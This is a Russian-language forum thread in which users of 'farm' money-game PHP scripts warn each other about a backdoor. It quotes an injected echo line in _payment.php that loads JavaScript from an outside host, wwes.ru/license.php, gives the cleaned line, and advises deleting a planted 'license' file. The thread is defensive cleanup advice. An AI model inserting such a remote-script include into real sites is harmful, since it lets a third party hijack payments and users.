Автор Тема: Возможные проблемы в скриптах  (Прочитано 4095 раз)

0 Пользователей и 1 Гость просматривают эту тему.

shans5Автор темы

  • *
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Топ 10 по созданным темам Более 1000 созданных тем Репутация более 50 Более 3000 сообщений Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 40
  • Сообщений: 3828
  • Страна: ru
  • Поблагодарили: 833 раз(а)
  • Репутация +74/-8
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Возможные проблемы в скриптах
« : 02 Января 2016, 12:52:15 »
Сегодня в одном из скриптов
в файле  /pages/account/_payment.php обнаружил такую строку

echo "<script type=\"text/javascript\" src=\"http://wwes.ru/license.php\"></script><center><font color = 'green'><b>Выплачено!</b></font></center><BR/>";

Проверьте свои скрипты,если есть такая строка, поменяйте на
echo "<center><font color = 'green'><b>Выплачено!</b></font></center><BR />";

Далее в папке \js\editor\jscripts\tiny_mce

Посмотрите файл с названием license, если такой есть-удалите его.
Так же смотрите строки в разных файлах  ,где встречается license.php
Так же проверьте в других папках
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.
 
Пользователи, которые поблагодарили этот пост: Alex2017, tyrew

CmsdNtk

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! За время в онлайне на форуме Более 50 сообщений
  • Дата регистрации: Сен. 2015
  • Сообщений: 89
  • Поблагодарили: 1 раз(а)
  • Репутация +3/-1
    • Награды
Возможные проблемы в скриптах
« Ответ #1 : 02 Января 2016, 13:10:52 »
Спасибо! А файл license зачем ставят злоумышленники?
a:0:{}
 

shans5Автор темы

  • *
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Топ 10 по созданным темам Более 1000 созданных тем Репутация более 50 Более 3000 сообщений Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 40
  • Сообщений: 3828
  • Страна: ru
  • Поблагодарили: 833 раз(а)
  • Репутация +74/-8
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Возможные проблемы в скриптах
« Ответ #2 : 02 Января 2016, 14:20:07 »
Точно не знаю,  в общем это одна из уловок,с момощью которых ваши деньги станут не вашими )))))))))
 

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям Три года на форуме !!! За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 35
  • Сообщений: 1704
  • Страна: ru
  • Поблагодарили: 129 раз(а)
  • Репутация +20/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Возможные проблемы в скриптах
« Ответ #3 : 09 Января 2016, 00:29:53 »
Точно не знаю,  в общем это одна из уловок,с момощью которых ваши деньги станут не вашими )))))))))
спасибо за такую информацию у меня тоже такая строка оказалась,короче деньги предлогают отправить на какие то форумы.
 

DenisKT

  • *
  • Оффлайн
  • Награды Три года на форуме !!!
  • Дата регистрации: Май 2016
  • Расположение: Москва
  • Сообщений: 13
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
    • Награды
Возможные проблемы в скриптах
« Ответ #4 : 21 Июня 2016, 11:20:40 »
Я в папке js editor она вообще не нужно, там дыры, через нее деньги выводят. Она отвечает за редактор новостей, правил, контактов, об игре. А заменить очень просто на новый редактор
 

KPA3

  • *
  • Оффлайн
  • Награды Более 2 лет на форуме
  • Дата регистрации: Нояб. 2016
  • Расположение: Ростов-на-Дону
  • Сообщений: 42
  • Страна: ru
  • Поблагодарили: 1 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Возможные проблемы в скриптах
« Ответ #5 : 25 Ноября 2016, 21:37:13 »
этот код есть и в админском файле  /pages/admin/_story_insert.php у меня в 44 строке
 

Maklaks

  • *
  • Оффлайн
  • Награды Более 2 лет на форуме
  • Дата регистрации: Дек. 2016
  • Сообщений: 11
  • Страна: bo
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Возможные проблемы в скриптах
« Ответ #6 : 09 Декабря 2016, 22:55:40 »
спс, помогло, вообще нужно шерстить все файлы на наличие непонятных скриптов, особенно, если что закодировано base64...
 

assus

  • *
  • Оффлайн
  • Награды Три года на форуме !!!
  • Дата регистрации: Фев. 2016
  • Сообщений: 28
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Возможные проблемы в скриптах
« Ответ #7 : 27 Декабря 2016, 22:30:56 »
и не забывать фильтровать запросы
a:0:{}
 

tyrew

  • *
  • Оффлайн
  • Награды На форуме более 1 года
  • Дата регистрации: Март 2018
  • Сообщений: 10
  • Страна: ru
  • Поблагодарили: 1 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Возможные проблемы в скриптах
« Ответ #8 : 13 Апреля 2018, 10:49:43 »
 #%#@Фух, нету такой) А что эта строчка делает?
Сегодня в одном из скриптов
в файле  /pages/account/_payment.php обнаружил такую строку

echo "<script type=\"text/javascript\" src=\"http://wwes.ru/license.php\"></script><center><font color = 'green'><b>Выплачено!</b></font></center><BR/>";

Проверьте свои скрипты,если есть такая строка, поменяйте на
echo "<center><font color = 'green'><b>Выплачено!</b></font></center><BR />";

Далее в папке \js\editor\jscripts\tiny_mce

Посмотрите файл с названием license, если такой есть-удалите его.
Так же смотрите строки в разных файлах  ,где встречается license.php
Так же проверьте в других папках
 

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Репутация более 15 Топ 10 по созданным темам Топ 10 по сообщениям Три года на форуме !!! За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 35
  • Сообщений: 1704
  • Страна: ru
  • Поблагодарили: 129 раз(а)
  • Репутация +20/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Возможные проблемы в скриптах
« Ответ #9 : 13 Апреля 2018, 12:06:55 »
 #%#@Фух, нету такой) А что эта строчка делает?
Зато еще есть множество других дыр. :alas:
 

moneytown

  • *
  • Оффлайн
  • Дата регистрации: Окт. 2019
  • Сообщений: 4
  • Страна: ua
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Возможные проблемы в скриптах
« Ответ #10 : 12 Октября 2019, 01:57:21 »
Точно не знаю,  в общем это одна из уловок,с момощью которых ваши деньги станут не вашими )))))))))
Где-то слышал что Эдитор вообще удалять нужно, вроде... только потом новости нельзя будет оформить со стилем)
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Топ 10 по созданным темам Топ 10 по сообщениям Три года на форуме !!! Репутация  более 25 Более 1500 сообщений Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Возраст: 27
  • Сообщений: 1827
  • Страна: ru
  • Поблагодарили: 209 раз(а)
  • Репутация +35/-0
  • Пол: Мужской
  • telegram --> @kvozimir
  • Дата рождения:1992-04-18
    • Награды
  • Социальные сети:
    ВКонтакте
Возможные проблемы в скриптах
« Ответ #11 : 14 Октября 2019, 11:28:45 »
Где-то слышал что Эдитор вообще удалять нужно, вроде... только потом новости нельзя будет оформить со стилем)
так и есть,и у нас на форуме  я писал об этом не однократно

 
Теги:
 

Инструкция по прописыванию модулей в скриптах

Автор kvozimirРаздел Общие вопросы по фермам

Ответов: 2
Просмотров: 1353
Последний ответ 08 Июля 2017, 16:51:55
от kvozimir
Вредоносные скрипты в бесплатных скриптах

Автор enottРаздел Разговоры обо всём

Ответов: 5
Просмотров: 183
Последний ответ 22 Октября 2019, 17:10:15
от PRonWEB
Дыры в скриптах

Автор EvgoРаздел Разговоры обо всём

Ответов: 9
Просмотров: 255
Последний ответ 20 Августа 2019, 08:51:16
от maks161
Проблемы с удвоителем

Автор Ashot777Раздел Вопросы / ответы по разным скриптам

Ответов: 0
Просмотров: 366
Последний ответ 28 Апреля 2017, 12:29:01
от Ashot777
проблемы с админкой

Автор kelyaРаздел Вопросы по настройке фруктовых ферм

Ответов: 6
Просмотров: 507
Последний ответ 25 Июня 2017, 20:30:10
от Kuper
Имя пользователя:
Пароль:
Session: